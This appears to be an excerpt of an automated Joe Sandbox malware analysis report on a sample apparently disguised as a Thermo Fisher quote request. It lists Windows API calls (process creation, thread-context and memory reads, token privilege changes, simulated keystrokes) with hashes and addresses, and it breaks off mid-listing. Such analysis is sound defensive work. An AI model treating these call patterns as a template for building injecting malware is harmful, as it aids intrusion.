                                                              • Opcode Fuzzy Hash: a282f762cf73e6dc8ef2cecde536aec33549eb85f694025eca7e10a9fdc54287
                                                              • Instruction Fuzzy Hash: 9CF0A43110422D67DB44BF98E8019DE7BEB9F01354F744129F909E2181DBB096819BB9
                                                              APIs
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • __lock_file.LIBCMT ref: 00623629
                                                                • Part of subcall function 00624E1C: __lock.LIBCMT ref: 00624E3F
                                                              • __fclose_nolock.LIBCMT ref: 00623634
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 62dd2407153268818ddd9e76f9930e9992d90d375d55a131ebabdabe4a21a0e2
                                                              • Instruction ID: 2e7aa44ff4aa9c0c5cc0a3789f5a3239e50368a2367fe80d3e55c91ed3079a78
                                                              • Opcode Fuzzy Hash: 62dd2407153268818ddd9e76f9930e9992d90d375d55a131ebabdabe4a21a0e2
                                                              • Instruction Fuzzy Hash: B3F0B471901E34AADB517B75E8027AE7AA76F40330F26810CF465AB3C1CB7C8A019F59
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4BA23
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D4BAB9
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D4BADB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                              • Instruction ID: b9f901658fa9bdc14601367c490d9e085b2c519b77ae5a321723d9c41460b5b7
                                                              • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                              • Instruction Fuzzy Hash: 1312BE24E14658C7EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4E91CF5A
                                                              APIs
                                                              • __flush.LIBCMT ref: 00622A0B
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __flush__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 4101623367-0
                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction ID: 48f17268af6db69a26a09f41a3e5c13d50c35150f119259257fbf0e35d0e3f94
                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction Fuzzy Hash: F041B570B00F27BFDB288E6AE8A15EE77A7AF44360B24852DE855C7640DA70DD818F44
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: f1b5292361f70d4f07231318639c7867302680a494c912af0192d187ac3f7889
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: 1F31C974A00105DBD718DF58E4909E9FBB6FF49340B6886A5E809CB355DB32EDC2CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 9f78cfebf7abf3cd460719f9870a33e4bd0541e256e72c67d032701b498b11c0
                                                              • Instruction ID: 23d85cab43fa39969b7e954e844ed370e961daa6f310e3cb3094e30b135f5149
                                                              • Opcode Fuzzy Hash: 9f78cfebf7abf3cd460719f9870a33e4bd0541e256e72c67d032701b498b11c0
                                                              • Instruction Fuzzy Hash: 27415D745086118FEB24DF14C444B5ABBF2BF85304F1989ACE99A4B762C372E886CF52
                                                              APIs
                                                                • Part of subcall function 00604214: FreeLibrary.KERNEL32(00000000,?), ref: 00604247
                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006039FE,?,00000001), ref: 006041DB
                                                                • Part of subcall function 00604291: FreeLibrary.KERNEL32(00000000), ref: 006042C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              • Opcode ID: fdd2daa54a66ea40070c4a1a43309cb95da05908e26971213f1410fec2f8cbcb
                                                              • Instruction ID: 1acf71a100f7b769c3d5b29fd223e437e3e49863cdc8243646cc7bbfdb52a227
                                                              • Opcode Fuzzy Hash: fdd2daa54a66ea40070c4a1a43309cb95da05908e26971213f1410fec2f8cbcb
                                                              • Instruction Fuzzy Hash: F211C471740206AACB68BB60DC16B9F77EB9F40700F10842DF696A61C1DF759B059B64
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: e59e04878f80aacf7ca4789e3d89ad2ea71c4b69a0dc7b07540f3145f1b5c8b4
                                                              • Instruction ID: 475d22af3bf001bf277821c4c3f30a01ead52f08ccfff2c8405c0669ff031bbd
                                                              • Opcode Fuzzy Hash: e59e04878f80aacf7ca4789e3d89ad2ea71c4b69a0dc7b07540f3145f1b5c8b4
                                                              • Instruction Fuzzy Hash: C5212774508601CFEB64DF64C444A9ABBF2BF85304F18896CF59A4B762C771E886CF52
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0062AFC0
                                                                • Part of subcall function 00627BDA: __getptd_noexit.LIBCMT ref: 00627BDA
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                              • String ID:
                                                              • API String ID: 1144279405-0
                                                              • Opcode ID: ab062d48ce1e3462e3d845da9a961ff12393ee9e34c7253e575f19cd7980061f
                                                              • Instruction ID: de2853d0359e48b33a4c9ed263f0da33a1d550f45b3cc9251f6e62a4c4619309
                                                              • Opcode Fuzzy Hash: ab062d48ce1e3462e3d845da9a961ff12393ee9e34c7253e575f19cd7980061f
                                                              • Instruction Fuzzy Hash: 6F11B2B2804E309FD7526FA4F802BA93763AF41332F165248F4701B1E2C7B88D018FA9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                              • Instruction ID: c6e1619b42a64cc8d95778236c06f6ac9e174cc1b80a3363612f655c86ecaf95
                                                              • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                              • Instruction Fuzzy Hash: 0801867154010AEECF49EF64C8918FFBB7AAF20304F00C069B515971D5EA309B49CF64
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00622AED
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: 84eaf5f65689e379ee92505b439294ae9ff316f343aad015632b51af97772994
                                                              • Instruction ID: 5c0585638731c1eddd608708adcffdd233cdad0c3076042dbb463e3a78ca05d2
                                                              • Opcode Fuzzy Hash: 84eaf5f65689e379ee92505b439294ae9ff316f343aad015632b51af97772994
                                                              • Instruction Fuzzy Hash: FFF0C231900A26BADF61AF74EC027DF3AA3BF00311F154429B4149A191C7788A62DF45
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,006039FE,?,00000001), ref: 00604286
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 03e8bae9f89d52f9aa42c209f2dfe7446068c6b69bff208c61147b1e75302d1e
                                                              • Instruction ID: 95d18c554800d197f57c9efdc9cc5a9b05e1bfd8603445e5fefe3d2d41357ebd
                                                              • Opcode Fuzzy Hash: 03e8bae9f89d52f9aa42c209f2dfe7446068c6b69bff208c61147b1e75302d1e
                                                              • Instruction Fuzzy Hash: F0F039B1649712DFCB389F64E894857BBE6BF043253248A7EF2D682650CB729A40DF50
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006040C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: c45f8a8699d69bbeab6760c9e094fd69665ad9e76061b7c3f63e05574fbe4de2
                                                              • Instruction ID: 8c19c5c257186f8e78ced0047f82e4fa32fa0197d02ae065d0c5f52754f2d8ca
                                                              • Opcode Fuzzy Hash: c45f8a8699d69bbeab6760c9e094fd69665ad9e76061b7c3f63e05574fbe4de2
                                                              • Instruction Fuzzy Hash: D3E0CD366001245BC711A758DC46FEB77AEDF8C6A0F050175F905D7284D97499818794
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00D4C279
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction ID: a791e28182db9327d24894f9267134859f4d6bc18dacbd398be102cea7487031
                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction Fuzzy Hash: 23E0BF7494120DEFDB00DFE8D5496DD7BB4EF04301F1005A1FD05D7680DB709E548A66
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00D4C279
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: fc9d8a1fc7608ea8e61b179cb24b3fc4c5d90fa9892981872591f26c276d5c80
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 3EE0E67494120DDFDB00DFF8D54969D7BF4EF04301F100161FD05D2280D6709D508A72
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0066F87D
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066F8DC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0066F919
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066F940
                                                              • SendMessageW.USER32 ref: 0066F966
                                                              • _wcsncpy.LIBCMT ref: 0066F9D2
                                                              • GetKeyState.USER32(00000011), ref: 0066F9F3
                                                              • GetKeyState.USER32(00000009), ref: 0066FA00
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066FA16
                                                              • GetKeyState.USER32(00000010), ref: 0066FA20
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066FA4F
                                                              • SendMessageW.USER32 ref: 0066FA72
                                                              • SendMessageW.USER32(?,00001030,?,0066E059), ref: 0066FB6F
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0066FB85
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0066FB96
                                                              • SetCapture.USER32(?), ref: 0066FB9F
                                                              • ClientToScreen.USER32(?,?), ref: 0066FC03
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0066FC0F
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0066FC29
                                                              • ReleaseCapture.USER32 ref: 0066FC34
                                                              • GetCursorPos.USER32(?), ref: 0066FC69
                                                              • ScreenToClient.USER32(?,?), ref: 0066FC76
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0066FCD8
                                                              • SendMessageW.USER32 ref: 0066FD02
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0066FD41
                                                              • SendMessageW.USER32 ref: 0066FD6C
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0066FD84
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0066FD8F
                                                              • GetCursorPos.USER32(?), ref: 0066FDB0
                                                              • ScreenToClient.USER32(?,?), ref: 0066FDBD
                                                              • GetParent.USER32(?), ref: 0066FDD9
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0066FE3F
                                                              • SendMessageW.USER32 ref: 0066FE6F
                                                              • ClientToScreen.USER32(?,?), ref: 0066FEC5
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0066FEF1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0066FF19
                                                              • SendMessageW.USER32 ref: 0066FF3C
                                                              • ClientToScreen.USER32(?,?), ref: 0066FF86
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0066FFB6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0067004B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 2516578528-4164748364
                                                              • Opcode ID: 329ebbc093bfc32d127f2a787386140d63b517b004e274c8505be853414911b9
                                                              • Instruction ID: 28f7e383327d31b427684d07f69e74f3a554d763dd9cdc1ebcddfd6624a76791
                                                              • Opcode Fuzzy Hash: 329ebbc093bfc32d127f2a787386140d63b517b004e274c8505be853414911b9
                                                              • Instruction Fuzzy Hash: 7532B970604244EFDB20CF68D884EAABBB6FF4A354F140A6DF695872A1D731EC51CB61
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0066B1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              • Opcode ID: e281f537a1636f2e9dde210edce9a13e585ca708e6c6fa47bc2417cb8ed6938b
                                                              • Instruction ID: e02eb6c2109ef79557d07ee7aee346a7ccc7528589d9b2493cc47699a7881e42
                                                              • Opcode Fuzzy Hash: e281f537a1636f2e9dde210edce9a13e585ca708e6c6fa47bc2417cb8ed6938b
                                                              • Instruction Fuzzy Hash: 3112CE71500208BBEB249F65DC49FAABBBAFF45310F144219F915EB2D1DB749982CF21
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 0061EB4A
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00673AEA
                                                              • IsIconic.USER32(000000FF), ref: 00673AF3
                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00673B00
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00673B0A
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00673B20
                                                              • GetCurrentThreadId.KERNEL32 ref: 00673B27
                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00673B33
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00673B44
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00673B4C
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00673B54
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00673B57
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B6C
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673B77
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B81
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673B86
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B8F
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673B94
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B9E
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673BA3
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00673BA6
                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00673BCD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: 1ed8778892cf55ac905b0e1043f86ad1a86d157e1afcede562778db5c7f2d4e0
                                                              • Instruction ID: bde9a2a44fd7ec85e8ea0c59228dd0e6a07f005dd4fc33c43e2b9d73b823a163
                                                              • Opcode Fuzzy Hash: 1ed8778892cf55ac905b0e1043f86ad1a86d157e1afcede562778db5c7f2d4e0
                                                              • Instruction Fuzzy Hash: E0317671A40328BBEB306B658C49FBF7F6EEB44B50F104116FA05EA2D0D6B15D41ABB1
                                                              APIs
                                                                • Part of subcall function 0063B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063B180
                                                                • Part of subcall function 0063B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063B1AD
                                                                • Part of subcall function 0063B134: GetLastError.KERNEL32 ref: 0063B1BA
                                                              • _memset.LIBCMT ref: 0063AD08
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0063AD5A
                                                              • CloseHandle.KERNEL32(?), ref: 0063AD6B
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0063AD82
                                                              • GetProcessWindowStation.USER32 ref: 0063AD9B
